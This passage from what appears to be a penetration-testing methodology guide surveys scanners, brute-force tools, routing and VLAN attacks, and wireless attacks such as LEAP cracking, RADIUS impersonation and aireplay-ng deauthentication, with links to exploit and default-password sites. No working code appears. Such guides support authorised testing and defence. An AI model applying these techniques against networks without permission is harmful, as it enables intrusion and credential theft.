whatever sections of your application you choose to visit, using Internet Explorer. List-Driven Assessment performs an assessment using a list of URLs to be scanned. Each URL must be fully qualified and must include the protocol (for example, http:// or https://). Workflow-Driven Assessment: WebInspect audits only those URLs included in the macro that you previously recorded and does not follow any hyperlinks encountered during the audit.

Screenshot Here

Screenshot Here

Once you have selected to appropriate options, click Next to continue.

Screenshot Here

Select Network Authentication if server authentication is required. Then choose the specific authentication method and enter your network credentials. Click Next to continue.

Screenshot Here

If enabled, the slider allows you to select one of four crawl positions. The options are Thorough, Default, Normal, and Quick. The specific settings are as follows:

Redundant Page Detection: OFF

Maximum Single URL Hits: 20

Maximum Web Form Submissions: 7

Create Script Event Sessions: ON

Maximum Script Events Per Page: 2000

Number of Dynamic Forms Allowed Per Session: Unlimited

Include Parameters In Hit Count: True

Default uses the following settings:

Redundant Page Detection: OFF

Maximum Single URL Hits: 5

Maximum Web Form Submissions: 3

Create Script Event Sessions: ON

Maximum Script Events Per Page: 1000

Number of Dynamic Forms Allowed Per Session: Unlimited

Include Parameters In Hit Count: True

Normal uses the following settings:

Redundant Page Detection: OFF

Maximum Single URL Hits: 5

Maximum Web Form Submissions: 2

Create Script Event Sessions: ON

Maximum Script Events Per Page: 300

Number of Dynamic Forms Allowed Per Session: 1

Include Parameters In Hit Count: False

Quick uses the following settings:

Redundant Page Detection: ON

Maximum Single URL Hits: 3

Maximum Web Form Submissions: 1

Create Script Event Sessions: OFF

Maximum Script Events Per Page: 100

Number of Dynamic Forms Allowed Per Session: 0

Include Parameters In Hit Count: False

Select the appropriate crawl position and click Next to continue.

Ensure that the select Run Profiler Automatically box is checked. Click Next to continue.

At this point the scan has been properly configured. There is an option to save the scan settings for later use. Click Scan to exit the wizard and begin the scan.

Screenshot Here

When conducting or viewing a scan, the Information pane contains three collapsible information panels and an information display area. Select the type of information to display by clicking on an item in one of three information panels in the left column.

The Scan Log Tab is used to view information about the assessment. For instance, the time at which certain auditing was conducted against the target. Finally, the Server Information Tab lists items of interest pertaining to the server.

The final step is to export the results further analysis. To export the results of the analysis to an XML file, click File, then Export. This presents the option to export the Scan or Scan Details.

From the Export Scan Details window we need to choose the Full from the Details option. This will ensure that we obtain the most comprehensive report possible. Since this is only available in XML format, the only option we have left to choose is to scrub data. If you want to ensure that SSN, and Credit Card data is scrubbed then select these options. If you choose to scrub IP address information then the exported data will be useless for our purposes. Click Export to continue. Choose the file location to save the exported data.

The first scan that is performed with WebInspect is the Web Site Assessment Scan. WebInspect makes use of the New Web Site Assessment Wizard to setup the assessment scans.

When you start the New wizard, the Web Service Scan Wizard window appears. The options displayed within the wizard windows are extracted from the WebInspect default settings. The important thing to note is that any changes you make will be used for this scan only.

Screenshot Here

Screenshot Here

As soon as you start a Web Service Assessment, WebInspect displays in the Navigation pane an icon depicting each session. It also reports possible vulnerabilities on the Vulnerabilities tab and Information tab in the Summary pane. If you click a URL listed in the Summary pane, the program highlights the related session in the Navigation pane and displays its associated information in the Information pane. The relative severity of a vulnerability listed in the Navigation pane is identified by its associated icon.

When conducting or viewing a scan, the Navigation pane is on the left side of the WebInspectwindow. It includes the Site, Sequence, Search, and Step Mode buttons, which determines view presented.

The Summary pane has five tabs: Vulnerabilities, Information, Best Practices, Scan Log, and Server Information. The Vulnerabilities Tab lists all vulnerabilities discovered during an audit. The Information Tab lists information discovered during an assessment or crawl. These are not considered vulnerabilities, but simply identify interesting points in the site or certain applications or Web servers. The Best Practices Tab lists issues detected by WebInspect that relate to commonly accepted best practices for Web development. Items listed here are not vulnerabilities, but are indicators of overall site quality and site development security practices (or lack thereof).

Screenshot Here

Screenshot Here

IBM AppScan

IBM Rational AppScan automates application security testing by scanning applications, identifying vulnerabilities and generating reports with recommendations to ease remediation. This tutorial will apply to the AppScan Standard Edition which is a desktop solution to automate Web application security testing. It is intended to be use by small security teams with several security testers.

To ensure APPScan has the latest updates you should click update on the toolbar menu. This will check the IBM servers for updates. Internet access is required.

The simplest way to configure a scan is to use the Configuration Wizard. You can access the Configuration Wizard by clicking “New” on the File menu. You will be presented with the “New Scan” dialog box. Enable or disable the “Configuration Wizard” by checking the box.

You can then choose what type of scan you wish to perform. The default is a Web Application Scan.

You then have to enter the starting URL for the web application. Other options on that screen include choosing Case-Sensitivity path for Unix\Linux systems, adding additional servers and domains and enabling proxy and platform authentication option. Uncheck the case-sensitivity path option if you know all the systems are windows as it can help reduce the scan time.

If the web application requires authentication then there are several options to choose from. Recorded allows you to record the login procedure so that AppScan can perform the login automatically. Prompt will prompt with the login screen during the scan when a login is required. Automatic can be used in web applications that only require a username and password. An important option is the “I want to configure In-Session detection options” if anything other they “None” is chosen. This option automatically detects if the web application is out of session. AppScan with automatically configure this feature but if it’s not correct scan results will be unreliable.

<AppScan06a Screen Shot Here>

By default AppScan tests the login and logout pages. This is enabled with the “Send tests on login and logout pages” option. Some applications have safeguards that could lockout the test account and prevent a scan from completing. You need monitor the testing logs to ensure login is not failing. AppScan also deletes previous session tokens before testing login pages. You may need to disable this option if a valid session token is required on the login pages. This can disabled by unchecking the “Clear session identifiers before testing login pages” option

You have now completed the scan configuration and will be prompted to start the scan. By default AppScan will start a full scan of the application. To ensure full coverage of the application a Manual Explore of the application is preferred. With this option AppScan with provide you with a browser window and you can access the application to explore every option and feature available. Once the full application has been explored you can close the browser and AppScan will add the discovered pages its list for testing. You can then start the full scan (Using ScanFull Scan on the menu bar) and AppScan will automatically scan the application.

Web Directory Listing/Bruteforcing

DirBuster is a java application that is designed to brute force web directories and files names. DirBuster attempts to find hidden or obfuscated directories, but as with any bruteforcing tool, it is only as good as the directory and file list utilized. For that reason, DirBuster has 9 different lists.

Webserver Version/Vulnerability Identification

The ability to identify the Webserver version is critical to identify vulnerabilities specific to a particular installation. This information should have been gathered as part of an earlier phase.

NetSparker (Windows)

NetSparker is windows based Web Application Scanner. This scanner tests for all common types of web application security flaws. This scanner allows the user to enter NTLM, Forms based and certificate based credentials. NetSparker boasts its ability to confirm the findings it presents to the user. NetSparker is an inexpensive Web Application Scanner.

Specialized Vulnerability Scanners

Virtual Private Networking (VPN)

Virtual Private Networking (VPN) involves “tunneling” private data through the Internet. The four most widely known VPN “standards” are Layer 2 Forwarding (L2F), IP Security (IPSec), Point-to-Point Tunneling Protocol (PPTP), and Layer 2 Tunneling Protocol (L2TP). VPN servers generally will not be detected by a port scans as they don’t listen on TCP ports, so a TCP port scan won’t find them. In addition, they won’t normally send ICMP unreachable messages, so a UDP port scans more than likely won’t find them. This is why we need specialized scanners to find and identify them.

ike-scan is a command-line IPsec VPN scanning, fingerprinting and testing tool that uses the IKE protocol to discover, fingerprint and test IPsec VPN servers. Ike-scan sends properly formatted IKE packet to each of the address you wish to scan and displays the IKE responses that are received. While ike-scan has a dozens of options, we will only cover the basics here.

Using ike-scan to actually perform VPN discovery is relatively straight forward. Simply give it a range and it will attempt to identify

IPv6

The THC-IPV6 Attack Toolkit is a complete set of tools to scan for inherent protocol weaknesses of IPv6 deployments. Implementation6 which performs various implementation checks on IPv6.

Exploit6 is another tool from the THC-IPV6 Attack Toolkit which can test for known ipv6 vulnerabilities.

Screenshot Here

War Dialing

War dialing is process of using a modem to automatically scan a list of telephone numbers, usually dialing every number in a local area code to search for computers, Bulletin board systems and fax machines.

WarVOX is a suite of tools for exploring, classifying, and auditing telephone systems. Unlike normal wardialing tools, WarVOX works with the actual audio from each call and does not use a modem directly. This model allows WarVOX to find and classify a wide range of interesting lines, including modems, faxes, voice mail boxes, PBXs, loops, dial tones, IVRs, and forwarders. WarVOX provides the unique ability to classify all telephone lines in a given range, not just those connected to modems, allowing for a comprehensive audit of a telephone system. VoIP

SIPSCAN uses REGISTER, OPTIONS and INVITE request methods to scan for live SIP extensions and users. SIPSCAN comes with a list of usernames (users.txt) to brute force. This should be modified to include data collected during earlier phases to target the specific environment.

SIPSAK

Screenshot Here

SVMAP is a part of the SIPVicious suite and it can be used to scan identify and fingerprint a single IP or a range of IP addresses. Svmap allows specifying the method being used such as OPTIONS, INVITE, and REGISTER.

Passive Testing

Passive Testing is exactly what it sounds like. Testing for vulnerabilities but doing so in a passive manner. This is often best left to automated tools, but it can be accomplished by manually methods as well.

Automated Tools

Traffic Monitoring

Traffic Monitoring is a passive mechanism for gathering further information about the targets. This can be helpful in determining the specifics of an operating system or network device. There are times when active fingerprinting may indicate, for example, an older operating system. This may or may not be the case. Passive fingerprinting is essentially a “free” way to ensure that the data you are reporting is as accurate as possible.

P0f is an awesome passive fingerprinting tool. P0f can identify the operating system on based upon machines you connect to and that you connect to as well as machines that you cannot connect to. Also, it can fingerprint machines based upon the communications that your interfaces can observe.

Wireshark

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.

Screenshot Here

Tcpdump

Tcpdump is a common packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. Tcpdump works on most Unix-like operating systems: Linux, Solaris, BSD, Mac OS X, HP-UX and AIX among others. In those systems, tcpdump uses the libpcap library to capture packets.

Screenshot Here

Metasploit Scanners

Metasploit Unleashed

The Metasploit Unleashed course has several tutorials on performing vulnerability scanning leveraging the Metasploit Framework.

Vulnerability Validation

Public Research

A product of the vast amount of security research is the discovery of vulnerabilities and associated Proof of Concept (PoC) and/or exploit code. The results from the vulnerability identification phase must be individually validated and where exploits are available, these must be validated. The only exception would be an exploit that results in a Denial of Service (DoS). This would need to be included in the scope to be considered for validation. There are numerous sites that offer such code for download that should be used as part of the Vulnerability Analysis phase.

Exploit-db – http://www.exploit-db.com

Security Focus – http://www.securityfocus.com

Packetstorm – http://www.packetstorm.com

Security Reason – http://www.securityreason.com

Black Asylum – http://www.blackasylum.com/?p=160

Common/default passwords

Attempt to identify if a device, application, or operating system is vulnerable to a default credential attack is really as simple as trying to enter in known default passwords. Default passwords can be obtained from the following websites:

http://www.phenoelit-us.org/dpl/dpl.html

http://cirt.net/passwords

http://www.defaultpassword.com

http://www.passwordsdatabase.com

http://www.isdpodcast.com/resources/62k-common-passwords/

Establish target list

Identifying all potential targets is critical to penetration testing. Properly established target lists ensure that attacks are properly targeted. If the particular versions of software running in the environment can be identified, the tester is dealing with a known quantity, and can even replicate the environment. A properly defined target list should include a mapping of OS version, patch level information. If known it should include web application weaknesses, lockout thresholds and weak ports for attack.

Mapping Versions

Version checking is a quick way to identify application information. To some extent, versions of services can be fingerprinted using nmap, and versions of web applications can often be gathered by looking at the source of an arbitrary page.

Identifying Patch Levels

To identify the patch level of services internally, consider using software which will interrogate the system for differences between versions. Credentials may be used for this phase of the penetration test, provided the client has acquiesced. Vulnerability scanners are particularly effective at identifying patch levels remotely, without credentials.

Looking for Weak Web Applications

Identifying weak web applications can be a particularly fruitful activity during a penetration test. Things to look for include OTS applications that have been misconfigured, OTS application which have plugin functionality (plugins often contain more vulnerable code than the base application), and custom applications. Web application fingerprinters such as WAFP can be used here to great effect.

Identify Weak Ports and Services

Identifying weak ports can be done using banner grabbing, nmap and common sense. Many ports and services will lie, or mislead about the specifics of their version.

Identify Lockout threshold

Identifying the lockout threshold of an authentication service will allow you to ensure that your bruteforce attacks do not intentionally lock out valid users during your testing. Identify all disparate authentication services in the environment, and test a single, innocuous account for lockout. Often 5 – 10 tries of a valid account is enough to determine if the service will lock users out.

Attack Avenues

Attack avenues focus on identifying all potential attack vectors that could be leveraged against a target. This is much more detailed than simply looking at the open or filtered ports, but evaluates the Footprinting information and automated results in an effort to create an attack tree.

Creation of Attack Trees

Attack trees are conceptual diagrams of threats on target systems and should include all possible attack methods to reach those threats.

Identify protection mechanisms

There is no magic bullet for detecting and subverting Network or Host based protection mechanisms. It takes skill and experience. This is beyond the scope of this document, which only lists the relevant protection mechanisms and describes what they do.

Network protections

“Simple” Packet Filters

Packet filters are rules for classifying packets based on their header fields. Packet classification is essential to routers supporting services such as quality of service (QoS), virtual private networks (VPNs), and firewalls.

Traffic shaping devices

Traffic shaping is the control of computer network traffic in order to optimize or guarantee performance, improve latency, and/or increase usable bandwidth for some kinds of packets by delaying other kinds of packets that meet certain criteria. During penetration test traffic shaping can also control the volume of traffic being sent into a network in a specified period, or the maximum rate at which the traffic is sent. For these reasons; traffic shaping is important to detect at the network edges to avoid packet dropping and packet marking.

Data Loss Prevention (DLP) systems

Data Loss Prevention (DLP) refers to systems that identify, monitor, and protect data in use, data in motion, and data at rest via content inspection and contextual analysis of activities (attributes of originator, data object, medium, timing, recipient/destination and so on). DLP systems are analogous to intrusion-prevention system for data.

Host based protections

Host-based protections usually revolve around an installed software package which monitors a single host for suspicious activity by analyzing events occurring within that host. The majority of Host-based protections utilize one of three detection methods: signature-based, statistical anomaly-based and stateful protocol analysis.

Stack/heap protections

Numerous tools are available that can monitor the host to provide protections against buffer overflows. Microsoft’s Data Execution Prevention mode is an example that is designed to explicitly protect the pointer to the SEH Exception Handler from being overwritten.

Whitelisting

Whitelisting provides a list of entities that are being provided a particular privilege, service, mobility, access, or recognition. An emerging approach in combating attacks by viruses and malware is to whitelist software which is considered safe to run, blocking all others

AV/Filtering/Behavioral Analysis

Behavioral analysis works from a set of rules that define a program as either legitimate, or malicious. Behavioral analysis technology monitors what an application or piece of code does and attempts to restrict its action. Examples of this might include applications trying to write to certain parts of a system registry, or writing to pre-defined folders. These and other actions would be blocked, with the actions notified to the user or administrator.

Application level protections

Exploitation

Precision strike

Additional information on exploitation can be found at the Metasploit Unleashed course.

Countermeasure Bypass

<Contribution Needed>

AV

<Contribution Needed>

Encoding

Packing

Whitelist Bypass

Process Injection

Purely Memory Resident

Human

<Contribution Needed>

HIPS

<Contribution Needed>

DEP

<Contribution Needed>

ASLR

<Contribution Needed>

VA + NX (Linux)

<Contribution Needed>

w^x (OpenBSD)

<Contribution Needed>

WAF

A WAF (Web application firewall) is a firewall which can be installed in front of (network topology speaking) a web application. The WAF will analyze each request and look for common web attacks such as Cross Site Scripting and SQLinjection. Like most AV scanners, a blacklisting mechanism is often used to find these potentially malicious HTTP requests (often regex). Since these WAFs are using this blacklisting technique, multiple papers exist on bypassing these types of devices.

Stack Canaries

In order to understand the use of the Stack Canaries, one needs to understand the fundamental flaw of buffer overflows. A buffer overflow happens when an application fails to properly verify the length of the input received with the length of the buffer in memory to which this data is copied. Due to the way the stack is build, and the way the data is entered on the stack, the input received could be used to overwrite the EIP (extended instruction pointer, this is used by the application to know where the application came from prior to copying the input to the buffer). When an attacker controls the EIP, the execution of the application can be altered in such a way that the attacker has full control of the application. A potential fix is by adding a “cookie” or stack canary right after the buffer on the stack. When the application wants to return, the value of the stack canary is verified. If this value has been altered, the program will ignore the EIP and crash therefore making the buffer overflow ineffective.

Microsoft Windows

The cookie in Windows is added by Visual Studio. One of the options when compiling an application is /GS. The option is enabled by default. The cookie is calculated using a few process specific variables. Below is a representative code of how this cookie is calculated.

As you can see, some of these values are not hard to figure out. Except for maybe the LowDateTime and the performance counter. An excellent paper has been written concerning this lack of entropy. More information can be found in that paper here (Exploiting the otherwise non-exploitable)

Linux

As in Windows, the somewhat default compiler, gcc, adds the code for the stack canarie. This code can be found in the file libssp/ssp.c

It is known that some older versions of gcc do not use the urandom device in order to create a new cookie. They use a preset cookie value (a mix of unprintable characters such as 00 0A 0D and FF). Gcc will compile an application with stack canaries by default.

MAC OS

Disabled by default. Contribution required.

Customized Exploitation

Fuzzing

Fuzzing is the process of attempting to discover security vulnerabilities by sending random input to an application. If the program contains a vulnerability that can leads to an exception, crash or server error (in the case of web apps), it can be determined that a vulnerability has been discovered. Fuzzers are generally good at finding buffer overflow, DoS, SQL Injection, XSS, and Format String bugs. Fuzzing falls into two categories: Dumb Fuzzing and Intelligent Fuzzing.

Dumb Fuzzing

Dumb Fuzzing usually consists of simple modifications to legitimate data, that is then fed to the target application. In this case, the fuzzer is very easy to write and the idea is to identify low hanging fruit. Although not an elegant approach, dumb fuzzing can produce results, especially when a target application has not been previously tested. FileFuzz is an example of a Dumb Fuzzer. FileFuzz is a Windows based file format fuzzing tool that was designed to automate the launching of applications and detection of exceptions caused by fuzzed file formats.

Intelligent Fuzzing

Intelligent Fuzzers are ones that are generally aware of the protocol or format of the data being tested. Some protocols require that the fuzzer maintain state information, such as HTTP or SIP. Other protocols will make use of authentication before a vulnerability is identified. Apart from providing much more code coverage, intelligent fuzzers tend to cut down the fuzzing time significantly since they avoid sending data that the target application will not understand. Intelligent fuzzers are therefore much more targeted and sometimes they need to be developed by the security researcher.

Sniffing

A packet analyzer is used to intercept and log traffic passing over the network. It is considered best practice to utilize a sniffer when performing exploitation. This ensures that all relevant traffic is captured for further analysis. This is also extremely useful for extracting cleartext passwords.

Wireshark

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.

Screenshot Here

Tcpdump

Tcpdump is a common packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. Tcpdump works on most Unix-like operating systems: Linux, Solaris, BSD, Mac OS X, HP-UX and AIX among others. In those systems, tcpdump uses the libpcap library to capture packets.

Screenshot Here

Brute-Force

A brute force attack is a strategy that can in theory be used by an attacker who is unable to take advantage of any weakness in a system. It involves systematically checking all possible usernames and passwords until the correct one is found.

Brutus (Windows)

Brutus is a generic password guessing tool that comes with built-in routines for attacking

POP3. Brutus can perform both dictionary and randomly generated attacks from a given character set.

Web Brute (Windows)

Web Brute is included with HP WebInspect and is the primary means of attacking a login form or authentication page, using prepared lists of user names and passwords.

Ncrack

Ncrack is another network logon bruteforcer which supports attacking many different services such as RDP, SSH, http(s), SMB, pop3(s), FTP, and telnet. Ncrack was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its behavior based on network feedback.

Routing protocols

Routing protocols specify how routers communicate with each other, disseminating information that enables them to select routes between any two nodes on a computer network, the choice of the route being done by routing algorithms. Each router has a priori knowledge only of networks attached to it directly. A routing protocol shares this information first among immediate neighbors, and then throughout the network. This way, routers gain knowledge of the topology of the network.

Cisco Discovery Protocol (CDP)

The Cisco Discovery Protocol (CDP) is a proprietary Data Link Layer network protocol developed by Cisco Systems that is implemented in most Cisco networking equipment. It is used to share information about other directly connected Cisco equipment, such as the operating system version and IP address. CDP can also be used for On-Demand Routing, which is a method of including routing information in CDP announcements so that dynamic routing protocols do not need to be used in simple networks.

The information contained in CDP announcements varies by the type of device and the version of the operating system running on it. This information may include the operating system version, hostname, every address (i.e. IP address) from all protocol(s) configured on the port where CDP frame is sent, the port identifier from which the announcement was sent, device type and model, duplex setting, VTP domain, native VLAN, power draw (for Power over Ethernet devices), and other device specific information. The details contained in these announcements are easily extended due to the use of the type-length-value (TLV) frame format. The tool for attacking CDP is Yersinia.

Hot Standby Router Protocol (HSRP)

Hot Standby Router Protocol (HSRP) is a Cisco proprietary redundancy protocol for establishing a fault-tolerant default gateway, and has been described in detail in RFC 2281. The Virtual Router Redundancy Protocol (VRRP) is a standards-based alternative to HSRP defined in IETF standard RFC 3768. The two technologies are similar in concept, but not compatible.

HSRP and VRRP are not routing protocols as they do not advertise IP routes or affect the routing table in any way.

Screenshot Here

Virtual Switch Redundancy Protocol (VSRP)

The Virtual Switch Redundancy Protocol (VSRP) is a proprietary network resilience protocol developed by Foundry Networks and currently being sold in products manufactured by both Foundry and Hewlett Packard. The protocol differs from many others in use as it combines Layer 2 and Layer 3 resilience – effectively doing the jobs of both Spanning tree protocol and the Virtual Router Redundancy Protocol at the same time. Whilst the restrictions on the physical topologies able to make use of VSRP mean that it is less flexible than STP and VRRP it does significantly improve on the failover times provided by either of those protocols.

Dynamic Trunking Protocol (DTP)

The Dynamic Trunking Protocol (DTP) is a proprietary networking protocol developed by Cisco Systems for the purpose of negotiating trunking on a link between two VLAN-aware switches, and for negotiating the type of trunking encapsulation to be used. It works on the Layer 2 of the OSI model. VLAN trunks formed using DTP may utilize either IEEE 802.1Q or Cisco ISL trunking protocols.

Screenshot Here

Spanning Tree Protocol (STP)

The Spanning Tree Protocol (STP) is a network protocol that ensures a loop-free topology for any bridged Ethernet local area network. The basic function of STP is to prevent bridge loops and ensuing broadcast radiation. Spanning tree also allows a network design to include spare (redundant) links to provide automatic backup paths if an active link fails, without the danger of bridge loops, or the need for manual enabling/disabling of these backup links.

Screenshot Here

Open Shortest Path First (OSPF)

Open Shortest Path First (OSPF) is an adaptive routing protocol for Internet Protocol (IP) networks. It uses a link state routing algorithm and falls into the group of interior routing protocols, operating within a single autonomous system (AS). It is defined as OSPF Version 2 in RFC 2328 (1998) for IPv4. The updates for IPv6 are specified as OSPF Version 3 in RFC 5340 (2008).

RIP

RIP is a dynamic routing protocol used in local and wide area networks. As such it is classified as an interior gateway protocol (IGP). It uses the distance-vector routing algorithm. It was first defined in RFC 1058 (1988). The protocol has since been extended several times, resulting in RIP Version 2 (RFC 2453). Both versions are still in use today, although they are considered to have been made technically obsolete by more advanced techniques such as Open Shortest Path First (OSPF) and the OSI protocol IS-IS. RIP has also been adapted for use in IPv6 networks, a standard known as RIPng (RIP next generation) protocol, published in RFC 2080 (1997).

VLAN Hopping

VLAN hopping (virtual local area network hopping) is a computer security exploit, a method of attacking networked resources on a VLAN. The basic concept behind all VLAN hopping attacks is for an attacking host on a VLAN to gain access to traffic on other VLANs that would normally not be accessible. There are two primary methods of VLAN hopping: switch spoofing and double tagging.

In a double tagging attack, an attacking host prepends two VLAN tags to packets that it transmits. The first header (which corresponds to the VLAN that the attacker is really a member of) is stripped off by a first switch the packet encounters, and the packet is then forwarded. The second, false, header is then visible to the second switch that the packet encounters. This false VLAN header indicates that the packet is destined for a host on a second, target VLAN. The packet is then sent to the target host as though it were layer 2 traffic. By this method, the attacking host can bypass layer 3 security measures that are used to logically isolate hosts from one another. The tool for attacking 802.1q is Yersinia.

VLAN Trunking Protocol (VTP)

VLAN Trunking Protocol (VTP) is a Cisco proprietary Layer 2 messaging protocol that manages the addition, deletion, and renaming of Virtual Local Area Networks (VLAN) on a network-wide basis. Cisco’s VLAN Trunk Protocol reduces administration in a switched network. When a new VLAN is configured on one VTP server, the VLAN is distributed through all switches in the domain. This reduces the need to configure the same VLAN everywhere. To do this, VTP carries VLAN information to all the switches in a VTP domain. VTP advertisements can be sent over ISL, 802.1q, IEEE 802.10 and LANE trunks. VTP is available on most of the Cisco Catalyst Family products. The tool for attacking VTP is Yersinia.

RF Access

The goal of the earlier phases is to gather every possible piece of information about the Radio Frequencies in use that can be leveraged during this phase.

Unencrypted Wireless LAN

It is possible to actually connect to an unencrypted Wireless LAN (WLAN). To connect to an unencrypted WLAN, you simply have to either issue appropriate commands or use a GUI interface to connect.

Iwconfig (Linux)

The following commands to connect up to the ESSID. To ensure that the wireless interface is down, issue the following:

Force dhclient to release any currently assigned DHCP addresses with the following command:

Bring the interface back up with the following command:

Iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces. It is used to set the parameters of the network interface which are specific to the wireless operation. To assign set the ESSID (or Network Name to the wireless interface, use the following command:

Next we need to set the operating mode of the device, which depends on the network topology. Setting this to Managed means that we are connecting to a network that is composed of access points.

Use dhclient to obtain a DHCP addresses with the following command:

At this point we should receive an IP address and be connected to the client’s wireless network. Ensure that adequate screen shots are taken to definitively indicate the ability to connect, receive an IP address, and traverse the network.

Windows (XP/7)

Based upon the wireless network adapter installed, Windows will provide you with a mechanism to connect to wireless networks. The version of Windows utilized will dictate the process. For this reason we are covering Windows XP and 7.

Windows XP will show an icon with a notification that says it has found wireless networks.

Right-click the wireless network icon in the lower right corner of your screen, and then click “View Available Wireless Networks.”

The Wireless Network Connection window appears and displays your wireless network listed with the SSID you chose. If you don’t see your network, click Refresh network list in the upper left corner. Click your network, and then click Connect in the lower right corner.

Screenshot Here

Screenshot Here

Screenshot Here

Attacking the Access Point

All identified access points are vulnerable to numerous attacks. For completeness, we’ve included some attack methods that may not be a part of all engagements. Ensure that the scoping is reviewed prior to initiating any attacks.

Denial of Service (DoS)

Within the standard, there are two packets that help in this regard, the Clear To Send (CTS) and Request To Send (RTS) packets. Devices use RTS packets when they have something big to send, and they don’t want other devices to step on their transmission. CTS packets are sent so that the device knows it’s okay to transmit. Every device (other than the one that sent the RTS) within the range of the CTS packet cannot transmit anything for the duration specified.

Cracking Passwords

WPA-PSK/ WPA2-PSK

WPA-PSK is vulnerable to brute force attack. Tools like Aircrack and coWPAtty take advantage of this weakness and provided a way to test keys against dictionaries. The problem is that it’s a very slow process. Precomputational attacks are limited as the BSSID and the BSSID length are seeded into the passphrase hash. This is why WPA-PSK attacks are generally limited due by time. There is no difference between cracking WPA or WPA2, the authentication is essentially the same.

WPA/WPA2-Enterprise

In environments with a large number of users, such as corporations or universities, WPA/WPA2 pre-shared key management is not feasible. For example, it wouldn’t be possible to track which users are connected and it would be impossible to revoke access to the network for individuals without changing the key for everyone. Therefore WPA2 Enterprise authenticates users against a user database (RADIUS). Two common methods to do that are WPA2-EAP-TTLS and WPA2-PEAP.

Attacks

LEAP

This stands for the Lightweight Extensible Authentication Protocol. This protocol is based on 802.1X and helps minimize the original security flaws by using WEP and a sophisticated key management system. This EAP-version is safer than EAP-MD5. This also uses MAC address authentication. LEAP is not safe against crackers. THC-LeapCracker can be used to break Cisco’s version of LEAP and be used against computers connected to an access point in the form of a dictionary attack. Anwrap and asleap are other crackers capable of breaking LEAP.

Asleap

Asleap is a designed specifically to recover weak LEAP (Cisco’s Lightweight Extensible Authentication Protocol) and PPTP passwords. Asleap performs Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture. Finally, it has the ability to deauthenticate clients on a leap WLAN (speeding up leap password recovery).

The first step involved in the use of asleap is to produce the necessary database (.dat) and index files (.idx) using genkeys from the supplied (-r) a dictionary (wordlist) file.

The final step in recovering the weak LEAP password is to run the asleap command with our newly created .dat and .idx files:

802.1X

802.1X is an IEEE Standard for port-based Network Access Control (PNAC). It is part of the IEEE 802.1 group of networking protocols. It provides an authentication mechanism to devices wishing to attach to a LAN or WLAN.

Key Distribution Attack

The key distribution attack exploits a weakness in the RADIUS protocol. The key distribution attack relies on an attacker capturing the PMK transmission between the RADIUS server and the AP. As the PMK is transmitted outside of the TLS tunnel, its protection is solely reliant on the RADIUS server’s HMAC-MD5 hashing algorithm. Should an attacker be able to leverage a man-in-the-middle attack between the AP and RADIUS sever, a brute-force attempt could be made to crack the RADIUS shared secret. This would ultimately provide the attacker with access to the PMK – allowing full decryption of all traffic between the AP and supplicant.

RADIUS Impersonation Attack

The RADIUS impersonation attack relies on users being left with the decision to trust or reject certificates from the authenticator. Attackers can exploit this deployment weakness by impersonating the target network’s AP service set identifier (SSID) and RADIUS server. Once both the RADIUS server and AP have been impersonated the attacker can issue a ‘fake’ certificate to the authenticating user. After the certificate has been accepted by the user the client will proceed to authenticate via the inner authentication mechanism. This allows the attacker to capture the MSCHAPv2 challenge/response and attempt to crack it offline.

PEAP

The Protected Extensible Authentication Protocol (Protected EAP or PEAP) is a protocol that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel. The purpose was to correct deficiencies in EAP; EAP assumed a protected communication channel, such as that provided by physical security, so facilities for protection of the EAP conversation were not provided.

RADIUS Impersonation Attack

The RADIUS impersonation attack relies on users being left with the decision to trust or reject certificates from the authenticator. Attackers can exploit this deployment weakness by impersonating the target network’s AP service set identifier (SSID) and RADIUS server. Once both the RADIUS server and AP have been impersonated the attacker can issue a ‘fake’ certificate to the authenticating user. After the certificate has been accepted by the user the client will proceed to authenticate via the inner authentication mechanism. This allows the attacker to capture the MSCHAPv2 challenge/response and attempt to crack it offline.

Authentication Attack

The PEAP authentication attack is a primitive means of gaining unauthorized access to PEAP networks. By sniffing usernames from the initial (unprotected) PEAP identity exchange an attacker can attempt to authenticate to the target network by ‘guessing’ user passwords. This attack is often ineffective as the authenticator will silently ignores bad login attempts ensuring a several second delay exists between login attempts.

EAP-Fast

EAP-FAST (Flexible Authentication via Secure Tunneling) is Cisco’s replacement for LEAP. The protocol was designed to address the weaknesses of LEAP while preserving the “lightweight” implementation. EAP-FAST uses a Protected Access Credential (PAC) to establish a TLS tunnel in which client credentials are verified. EAP-FAST provides better protection against dictionary attacks, but is vulnerable to MITM attacks. Since many implementations of EAP-FAST leave anonymous provisioning enabled, AP impersonation can reveal weak credential exchanges.

WEP/WPA/WPA2

The core process of connecting to a WEP encrypted network revolves around obtaining the WEP key for the purpose of connecting to the network. There are several tools that can be used to perform attacks against WEP.

Aircrack-ng

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.

Airmon-ng

To start wlan0 in monitor mode:

To start wlan0 in monitor mode on channel 8:

To stop wlan0:

To check the status:

Screenshot Here

Screenshot Here

Airodump-ng is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP IVs (Initialization Vector) for the intent of using them with Aircrack-ng. If you have a GPS receiver connected to the computer, Airodump-ng is capable of logging the coordinates of the found access points.

Screenshot Here

Aireplay-ng

These are the attack names and their corresponding “numbers”:

Attack 0: Deauthentication

Attack 1: Fake authentication

Attack 2: Interactive packet replay

Attack 3: ARP request replay attack

Attack 4: KoreK chopchop attack

Attack 5: Fragmentation attack

Attack 9: Injection test

Note: Not all options apply to all attacks.

A deauthentication attack sends disassociation packets to one or more clients who are currently associated with an AP. Disassociating clients can reveal a hidden / cloaked ESSID. Deauthentication attacks also provide an ability to capture WPA/WPA2 handshakes by forcing clients to re-authenticate.

-0 means deauthentication

1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously

